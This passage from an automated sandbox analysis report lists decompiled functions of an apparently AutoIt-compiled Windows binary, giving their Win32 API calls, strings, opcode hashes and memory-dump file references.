                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __snwprintf_memmove
                                                                                                                                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                                                  • API String ID: 3506404897-2584243854
                                                                                                                                                                  • Opcode ID: 6be27905461cbc2ce7f272898d08a68cedd5245b8131ecd49b1a7f04cc3e72d4
                                                                                                                                                                  • Instruction ID: 4a9e1e3180cb4a228450ebc061af881f69239c9379725e542b844f0bab6a461c
                                                                                                                                                                  • Opcode Fuzzy Hash: 6be27905461cbc2ce7f272898d08a68cedd5245b8131ecd49b1a7f04cc3e72d4
                                                                                                                                                                  • Instruction Fuzzy Hash: 8421E171610218BFCF00EF95CC8AEAE77B9EF55700F008855F505A7182DB70EA62CBA1
                                                                                                                                                                  Function 002491DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00249269
                                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00249274
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                  • String ID: Combobox
                                                                                                                                                                  • API String ID: 3850602802-2096851135
                                                                                                                                                                  • Opcode ID: 6f31c52a5f2640379db2da569e3db611324a94276b9afdcf33bec5c256a40eed
                                                                                                                                                                  • Instruction ID: 6ac4d6b9b1b8a267a906b21f5ba058c58ed81a4aaa33f22b04da61b83f51d75e
                                                                                                                                                                  • Opcode Fuzzy Hash: 6f31c52a5f2640379db2da569e3db611324a94276b9afdcf33bec5c256a40eed
                                                                                                                                                                  • Instruction Fuzzy Hash: 0411C871710109BFEF15DF54DC91EBB375AEB893A4F104124F91997290D6B1DCB18BA0
                                                                                                                                                                  Function 0024970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 001FC657
                                                                                                                                                                    • Part of subcall function 001FC619: GetStockObject.GDI32(00000011), ref: 001FC66B
                                                                                                                                                                    • Part of subcall function 001FC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 001FC675
                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00249775
                                                                                                                                                                  • GetSysColor.USER32(00000012), ref: 0024978F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                  • String ID: static
                                                                                                                                                                  • API String ID: 1983116058-2160076837
                                                                                                                                                                  • Opcode ID: 3990784804fd8f24af77b10a1548d5cb76695c442ba012aab2958c9deeea1494
                                                                                                                                                                  • Instruction ID: ee2590dcc280e938e61d73629877b5473fffc1f5a5bc835fd1e05cd5061e9341
                                                                                                                                                                  • Opcode Fuzzy Hash: 3990784804fd8f24af77b10a1548d5cb76695c442ba012aab2958c9deeea1494
                                                                                                                                                                  • Instruction Fuzzy Hash: D311297262020AAFDF04DFB8DC49EEA7BA8FB08314F014529F956E3250D775E861DB50
                                                                                                                                                                  Function 00249424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 002494A6
                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002494B5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LengthMessageSendTextWindow
                                                                                                                                                                  • String ID: edit
                                                                                                                                                                  • API String ID: 2978978980-2167791130
                                                                                                                                                                  • Opcode ID: 37688154b371129e6a8f380dcffbac112ca5e5b55eabb564a42af33b14e6a92a
                                                                                                                                                                  • Instruction ID: 2cb70cfc177ca667feff8d9f91bca3c683720dd6ee78eddaa84379661147cd60
                                                                                                                                                                  • Opcode Fuzzy Hash: 37688154b371129e6a8f380dcffbac112ca5e5b55eabb564a42af33b14e6a92a
                                                                                                                                                                  • Instruction Fuzzy Hash: 9A116D71520109AFEF148EA4EC44AAB3769EB05378F508724F965931D0C775DCA29B60
                                                                                                                                                                  Function 00225C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 00225CF3
                                                                                                                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00225D12
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                                                                  • Opcode ID: fe1f90b2f41af6e0f23d5f9c309964070d28efca48cd760517936de6315ac210
                                                                                                                                                                  • Instruction ID: 8166e462f90ec8a5bb75d53f437adb4ce98d83de0185339d67fe3486a1aeca19
                                                                                                                                                                  • Opcode Fuzzy Hash: fe1f90b2f41af6e0f23d5f9c309964070d28efca48cd760517936de6315ac210
                                                                                                                                                                  • Instruction Fuzzy Hash: 2A118171921639BBDB20DE98F848B9977E99B06354F188012E941EB191E7B0AD24C791
                                                                                                                                                                  Function 002353F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0023544C
                                                                                                                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00235475
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$OpenOption
                                                                                                                                                                  • String ID: <local>
                                                                                                                                                                  • API String ID: 942729171-4266983199
                                                                                                                                                                  • Opcode ID: 2dfae7d20ddf2d5e82cab5a38ca2e343c6c4f6f40c2f408d45f171d38633bf00
                                                                                                                                                                  • Instruction ID: d0e1b70a52b50e1f487539ad4cdf04d86ecfc509222591a352675c6f7ac05387
                                                                                                                                                                  • Opcode Fuzzy Hash: 2dfae7d20ddf2d5e82cab5a38ca2e343c6c4f6f40c2f408d45f171d38633bf00
                                                                                                                                                                  • Instruction Fuzzy Hash: A211A7F0661631BADB198F518C84EF7FB68FF16752F10812AF64956040E3B059A0C6F1
                                                                                                                                                                  Function 0020B4BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00214557
                                                                                                                                                                  • ___raise_securityfailure.LIBCMT ref: 0021463E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                  • String ID: (*
                                                                                                                                                                  • API String ID: 3761405300-2802481617
                                                                                                                                                                  • Opcode ID: 2d212ba1dbb8c3a14d0b67ca87e0bd80f78ec95fd150f43d7e9275db044a4d46
                                                                                                                                                                  • Instruction ID: b1f2f1f0fb4722b28f9f1055f4f52ef35d7405f3ea9c6b4902ac3cfcc4e36f56
                                                                                                                                                                  • Opcode Fuzzy Hash: 2d212ba1dbb8c3a14d0b67ca87e0bd80f78ec95fd150f43d7e9275db044a4d46
                                                                                                                                                                  • Instruction Fuzzy Hash: C1210EB65503049BD700DF14FAD9A407BF0FB5E310F10586AE9088B2A0EBF0A980EF86
                                                                                                                                                                  Function 0023ACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: htonsinet_addr
                                                                                                                                                                  • String ID: 255.255.255.255
                                                                                                                                                                  • API String ID: 3832099526-2422070025
                                                                                                                                                                  • Opcode ID: c385bcc9eb98299c3a3bdeb0d8e9ee467d4c2e9b2101e0babfeda72afe1cbef6
                                                                                                                                                                  • Instruction ID: f026583cec1974be9ccb8f1fdf2715e59c3ddeb15d8061df928255d2252b745a
                                                                                                                                                                  • Opcode Fuzzy Hash: c385bcc9eb98299c3a3bdeb0d8e9ee467d4c2e9b2101e0babfeda72afe1cbef6
                                                                                                                                                                  • Instruction Fuzzy Hash: 260145B4220209ABCB10DFA4D846FADB364FF18720F208436F5119B2C1CB71E820CB52
                                                                                                                                                                  Function 0021C577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0021C5E5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend_memmove
                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                  • API String ID: 1456604079-1403004172
                                                                                                                                                                  • Opcode ID: 93e1d500d9247929aea642860d1bf8282e3e1379cb58753222f5e28ba94313c5
                                                                                                                                                                  • Instruction ID: e86a64a20f75780585ed5f07decb913fe729ede0cfea71188a7714ec9150cffc
                                                                                                                                                                  • Opcode Fuzzy Hash: 93e1d500d9247929aea642860d1bf8282e3e1379cb58753222f5e28ba94313c5
                                                                                                                                                                  • Instruction Fuzzy Hash: 9401F531661518BBCB04EB64CC528FE33AAAB62310B640618F433A32D1DB7068598750
                                                                                                                                                                  Function 0022C4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __fread_nolock_memmove
                                                                                                                                                                  • String ID: EA06
                                                                                                                                                                  • API String ID: 1988441806-3962188686
                                                                                                                                                                  • Opcode ID: 1d252c41249b65dd6b141ae21abb909259e34a9e936281fa96f991b9459ab1b2
                                                                                                                                                                  • Instruction ID: 47de6ca6ba59d25841205c94a0e90c10ccc901f4c7c242e052b44cd0778d3298
                                                                                                                                                                  • Opcode Fuzzy Hash: 1d252c41249b65dd6b141ae21abb909259e34a9e936281fa96f991b9459ab1b2
                                                                                                                                                                  • Instruction Fuzzy Hash: BC01F572910228BEDB28DBA8CC16FBE7BF89B15311F00415AE293D21C1E5B4E718CB60
                                                                                                                                                                  Function 0021C473 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 0021C4E1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend_memmove
                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                  • API String ID: 1456604079-1403004172
                                                                                                                                                                  • Opcode ID: 56f8c455fa3e582cfd6cc119fb070e3dacde9fcd0da8e1e30409d59f479a3465
                                                                                                                                                                  • Instruction ID: 3869d46ac48e2bd45c81feb625a7cdc8d11100aa1336ac1d3ba3f6467eebec38
                                                                                                                                                                  • Opcode Fuzzy Hash: 56f8c455fa3e582cfd6cc119fb070e3dacde9fcd0da8e1e30409d59f479a3465
                                                                                                                                                                  • Instruction Fuzzy Hash: 6D01F2766A1508ABCB14EBA4CD62EFF33ED9F61700F240025F903E31C1EB549E5997A1
                                                                                                                                                                  Function 0021C4F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 0021C562
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend_memmove
                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                  • API String ID: 1456604079-1403004172
                                                                                                                                                                  • Opcode ID: 52b2b4a28c6359016a4eb4054331162b0dfcc27a75b0c2665c5c71100c537bcf
                                                                                                                                                                  • Instruction ID: 30532c3dd6d70312d6ad83bad60e6832dc7260173f340a106eabc06f2c6eba5f
                                                                                                                                                                  • Opcode Fuzzy Hash: 52b2b4a28c6359016a4eb4054331162b0dfcc27a75b0c2665c5c71100c537bcf
                                                                                                                                                                  • Instruction Fuzzy Hash: E601DF76A51508BBCB10EAA4CD12AFF33EE9B21700F640024B403F3181EA609E5996A1
                                                                                                                                                                  Function 0022804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClassName_wcscmp
                                                                                                                                                                  • String ID: #32770
                                                                                                                                                                  • API String ID: 2292705959-463685578
                                                                                                                                                                  • Opcode ID: 6399b5e38f174d3fcaf3d10f4e24597ddce925561cdf61d33b4e6198d652a111
                                                                                                                                                                  • Instruction ID: 2a412de5d083a18f6c852cfc5bc9089c271b8f639c236493f2afa01a178fa627
                                                                                                                                                                  • Opcode Fuzzy Hash: 6399b5e38f174d3fcaf3d10f4e24597ddce925561cdf61d33b4e6198d652a111
                                                                                                                                                                  • Instruction Fuzzy Hash: 70E0D837A0032967D720EAA6FC4EED7FBACEB52764F100026F914D3081DAB0D6558BD4
                                                                                                                                                                  Function 0020DA03 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • __umatherr.LIBCMT ref: 0020DA2A
                                                                                                                                                                    • Part of subcall function 0020DD86: __ctrlfp.LIBCMT ref: 0020DDE5
                                                                                                                                                                  • __ctrlfp.LIBCMT ref: 0020DA47
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
